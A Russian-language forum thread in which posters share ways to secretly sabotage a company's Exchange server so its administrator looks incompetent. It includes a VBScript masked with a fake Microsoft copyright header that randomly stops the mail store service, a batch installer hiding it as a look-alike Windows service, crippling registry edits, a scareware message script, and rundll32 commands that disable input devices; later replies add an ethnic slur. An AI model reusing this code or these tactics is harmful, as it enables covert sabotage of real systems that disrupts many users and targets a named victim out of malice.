нужно сделать западло сисадмину !!!

[KpNemo]

Привет Всем.
Многие сталкивались с проблемой восстановления Оконных систем.
Как не странно, но иногда бывает и наоборот.
Совсем недавно столкнулся с очень интересным заказом.
Нужно было сделать так, что бы Админ сошёл с ума.
Задача была очень простая, надо было сделать так. что бы Microsoft Exchange Server вел себя так, будто с ним что то не в порядке.

Получив полную информацию о системе, принялись за работу. Кофингурация была следующия:
Win NT 4 + SP6a
IE5.5 + SP2
Exchange Server 5.5 + SP4.
McAfee Antivirus + Exchange.

Первое, что пришло в голову, сделать что либо, что эмитирует проблемы которые встречаются после установки антивируса.

Был написан VB скрипт. назвали скрипт Networks.vbs. Вот содержание этого скрипта:

' Windows Script Host Sample Script
'
' ------------------------------------------------------------------------
' Copyright (C) 1996 Microsoft Corporation
'
' You have a royalty-free right to use, modify, reproduce and distribute
' the Sample Application Files (and/or any modified version) in any way
' you find useful, provided that you agree that Microsoft has no warranty,
' obligations or liability for any Sample Application Files.
' ------------------------------------------------------------------------
'
' This sample demonstrates how to use the WSHNetwork object.
' It reads network properties (username and computername),
' connects, disconnects, and enumerates network drives.
' ********************************************************************** **********

Dim FSO, f, sysdrive, FileName
Set WshShell = WScript.CreateObject( "WScript.Shell" )
Set fso = CreateObject("Scripting.FileSystemObject")

sysdrive = WshShell.ExpandEnvironmentStrings ("%systemdrive%")

FileName = "C:\WINNT\SYSTEM32\558set.hlp"
for i = 1 to 2
Randomize
' msgbox Int(100000000*Rnd)/1.2/1000/60
' msgbox Int(100000000*Rnd)/1.2
Wscript.Sleep Int(100000000*Rnd)/1.2
' Wscript.Sleep 60000
if (fso.FileExists(FileName)) Then
' WshShell.Run "cvshost.exe "& FileName, 0, True
' msgbox "oK"
WshShell.Run "Net Stop MSExchangeIS", 0, True
End If
i = 1
next

Шапка в начале скрипта, как Вы понимаете, просто маскировка.
Этот скрипт проверяет наличие файла 558set.hlp в директории C:\WINNT\SYSTEM32.
Если этого файла нет, то скрипт становится безобидным. Если этот файл там есть, неважно что написано в файле, то наш скрипт выполняется.
Когда работает скрипт, генерируется любое число, которое мы используем как параметр задержки. Когда период задержки заканчивается, на сервере останавливается сервис базы данных, ну и Вы понимаете, что происходит, ВСЕ пользователи моментально отключаются от всех почтовых ящиков. Чтобы на компьютере работал скрипт, и его было трудно вычислить, мы переписываем файл wscript.exe в файл cvshost.exe. Правда выглядит правдоподобно?

Теперь надо сделать так, что бы наш скрипт всегда запускался и работал, причём что бы на него никто не обращал внимание.
Мы решили создать новый сервис. Сервис мы назвали NetDDEU. Похожий сервис всегда существует на компьютере.
Чтобы создать сервис, мы использовали файлы instsrv.exe и srvany.exe из ресурс кит виндов. Мы немного упростили весь процесс установки, написав файл Install.bat. Вот содержимое этого файла:

@echo off
if not exist "%SYSTEMROOT%\system32\srvany.exe" copy srvany.exe "%SYSTEMROOT%\system32"
if not exist "%SYSTEMROOT%\system32\cvshost.exe" copy "%SYSTEMROOT%\system32\wscript.exe" "%SYSTEMROOT%\system32\cvshost.exe"
if not exist "%SYSTEMDRIVE%\PROGRA~1\PLUS!\MICROS~1\SETUP\Networks.vbs" copy Networks.vbs "%SYSTEMDRIVE%\PROGRA~1\PLUS!\MICROS~1\SETUP"

instsrv "NetDDEU" "%SYSTEMROOT%\system32\srvany.exe"

echo REGEDIT4 > "%Temp%\netddeu.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetDDEU] >> "%Temp%\netddeu.reg"
echo "Description"="Manages shared dynamic data exchange and is used by Network DDEU" >> "%Temp%\netddeu.reg"
echo "DisplayName"="Network DDEU" >> "%Temp%\netddeu.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetDDEU\Parameter s] >> "%Temp%\netddeu.reg"
echo "Application"="%SYSTEMDRIVE%\\WINNT\\System32\\cvshost.exe">> "%Temp%\netddeu.reg"
echo "AppParameters"="%SYSTEMDRIVE%\\PROGRA~1\\PLUS!\\MICROS~1\\SETUP" >> "%Temp%\netddeu.reg"

regedit /s "%Temp%\netddeu.reg"
echo y| del "%Temp%\netddeu.reg"

pause

ПРИМЕЧАНИЕ: Что бы всё работало без проблем, на сервере должен быть установлен WHS version 5.6

Вдогонку к сказанному, было предпринято ещё 2 шага.
1. Было сделано так, что все пользователи системы могли посылать почту одновременно только к 2 абонентам. Сделали это при помощи маленьких изменений в регистри. Вот, что было изменено:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSExchangeIS\Para metersSystem]
"Max Recipients on Submit"=dword:00000002

2. Был выставлен лимит на количество подключений к серверу. После этих изменений только 50 человек могли одновременно работать с сервером. А менять надо было следующее:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\para meters]
"Users"=dword:00000032

Можете себе представить состояние того Админа. Нет никаких ошибок, всё работает без проблем, но......




у кого есть советы пожелания ... пишите

[Vagus]

Ты только попугать хочешь?Не хочешь заодно грохнуть базу сексчейнджа?

[KpNemo]

Vagus
грохнуть сразу не проблема
надо именно сделать работу трудной чтоб были постоянные траблы ... вообщем чтоб слетала база там чтоб юзвери жаловались на плохую работу сисадмина .. ибо он редиска кое кому из друзей на хвост начал наступать ..
бду очень рад услышгать еще предложения .

[Gera1999]

не сказал бы я тебе спасибо!
А заказчик то сам- не боится? у сиса тоже небось
хаверим имеются. (изв. за флейм)

вы не админу насолите, а юзверям, которые этим эксченджем пользуются! Админу пофиг имхо - хорош или плохо работает, когдла припрет просто снесёт весь этот геммор и поставит по новой.

если уж админ так провинился, то почему бы не погорить с ним по-взрослому, а то эти еврейские выгугоны с написанием скриптов, Вы шо тут в матрицу играете? %)

[KpNemo]

Rel
еще один намёк на национальности нп этом форуме и тебя здесь больше не будет это раз .

второе , я не спрашивал ваше отношение к делу, я спрашивал есть ли еще у кого идеи как это сделать красиво и при этом не убивать сервак
если нет сррброжений, то просьба не флеймить.
а обсудить можно во флейме . тут только конструктивные предложения.

[ArchiMage]

Rel

продолжаем?! уже не первая твоя заявка!!!
скажи мне что ты делаеш на форуме где часть администраторов и модераторов из Израиля? ведь раз так то скорее всего ты еше много увидеш етих "еврейские выгугоны " которые так оскорбляют чистоту твоих мыслей... зачем тебе ета головная боль... ведь завтра ты вынужден будеш скорее всего увидеть еше и Израильский флаг в моей подписи...а он тебя наверняка так раздражает...зачем тебе все ето? ето вопрос реторический! не отвечай (дабы не разводить флейм) а подумай над ним! может стоит тебе перейти на другой проект.... где тебя больше поймут, пожалеют...

[Sapres]

мда, прикольно, помню давно с другом прикольнулся установил ему на комп прогу Revenge и ещё пару каких то, он чуть не посидел )) cd-rom выдвигался каждые 15 минут, каждые 20 минут изчезала панель задач, курсор мыши бегал по экрану, кнопки мыши менялись местами каждую минуту, всякие сообщения вываливались каждые минут 10, но после сообщения "Неустранимая ошибка в "Program Files", требуется переустановить "Мои Документы"" тут он всё понял и на следующий день крыл меня матом
так вот, может просто написать пару скриптов которые действуют графически, ведь пользователи тут не замешаны, хотя если сильно насолил и его надо скинуть оттуда как админа, то можно продолжать в таком духе, например что бы от его лица всем пользователям каждые пол часа слались сообщения типа "Волки #идарасы, #идарасы, а я гений. А вы что не знали?", типа в таком духе, но можно и по жощче писмеца делать, ограничение только фантазия ))

[Kexit]

А я прочитал - "эти европейские выгугоны" Думаю - во педант, до чего люди дошли, у европы особенные выгугоны нашли

KpNemo

Можно просто в WinHex`е парочку системных файлов открыть и парочку dll`лок, поменять по мелочам всего, главное, чтоб размерчик не поменялся после этого. Тоже прикольно получается

[alexcop]

Всем привет!
Идея, высказанная капитаном мне нравится, но по мойму на системах windows XP она легко устраняется элементарным откатом на несколько дней назад(часто помогает), да и у каждого сисадмина (точнее почти у каждого) имеется образ системы, с помощью которого все будет восстановлено минут через 25-30. Вот такое мое IMHO.
Ну а если солить, так солить с пересолом. Я бы предложил бы идейку с лишением админа всех администраторских прав и подменой паролей на вход к любым настройкам. Пользователи работают без проблем (или с очень незначительными), а сисадмин не может ничего исправить. Он раз 10-15 (или более) перезагружает сервер, весь в мыле, грязно ругается и вдруг... все восстановилось и его права и все остальное, он тщетно пытается найти наполадки, а их просто нет..., проходит несколько дней и опять все снова...
При такой работе и седина пробить может.
Удачи!

[DeL]

Грохнуть админа, и всего делов...

А так мона попробовать файлбомбу пущай сама ся копирует и место на диске меньше и тормоза начинаются .... (видел в сети ... даже антивири неберут)

[ArchiMage]

думаю ето немножко позлит админа если поигратса с sam files в конце процесса админ а не может логинитса
no esli on kazhdoe utro naprimer delaet ghost to ne dumayu chto chto-to iz togo chto tut skazano povredit emu.....

[helldomain]

Ugu. Awtobackup ;-))).

[peterbald]

Не зли админа ,не строй ему рожи, и не бери с собой палку.Просто подойди и улыбнись ему и он улыбнется тебе в ответ

[helldomain]

Gi. Mnogie admini uje razuchilis ulibatsya i mogut prinyat wid oskalennih rezcow za ugrozu jizni.

[peterbald]

:-) Ну я же улыбаюсь ;-)

KpNemo

Могу предложить, используя один из эксполитов получить на машине шелл, а там, используя командную строку повозиться с процессами, что-то добавить, что-то поубивать.

Недавно как в 2К так в НТ и XP обнаружили новую дырку!!!!
ужо и эксплоитов понавыходило.....

Есть очень известный способ попугать ламера.
Код:
If Day(now)>15 then
Hacker=msgbox("ВНИМАНИЕ! Компания Microsoft ввела новую программу против
пиратства. Если вы не зарегестрируете данную версию Windows до конца
месяца, то будет произведено форматирование всех жестких дисков!
Дополнительную информацию вы найдете на официальном сайте компании
MicroSoft.",48, "System Error")
sub executer(exe,wait)
set wshshell=wscript.createobject("wscript.shell")
exec=wshshell.run(exe,wait)
end sub
call executer("hh.exe windows.chm", true)
end if

Ещё есть разные способы вызова команды call:
rundll32 keyboard,disable - отключить клавиатуру;
rundll32 mouse,disable - отключить мышь;
rundll32 user,swapmousebutton - поменять местами клавиши мыши;
rundll32 user,disableoemlayer - спровоцировать сбой (обрати внимание!);
rundll32 shell32,SHExitWindowsEx 0 - завершить работу текущего пользователя;
rundll32 krnl386.exe,exitkernel - выход из Windows без любых
сoобщений/вопросов;
rundll32 shell32,ShellAboutA Info-Box - показать окно About Windows.

ну ну, у всех в сетке прям свободный доступ к серверу, создание служб.... если такой сисадмин, его мучать не надо, его надо уволить.
чушь полная...

[Псих]

можно угробить математический сопроцессор (FPU) тады лагов хватит на трех админов!

Можно прописать скрипт, чтобы при каждой загрузке файл подкачки на ноль метров ставил

З.Ы. Хе хе.. кто же это тему так из глубин форума поднял! Только сейчас заметил, что тема пожилая до седин костей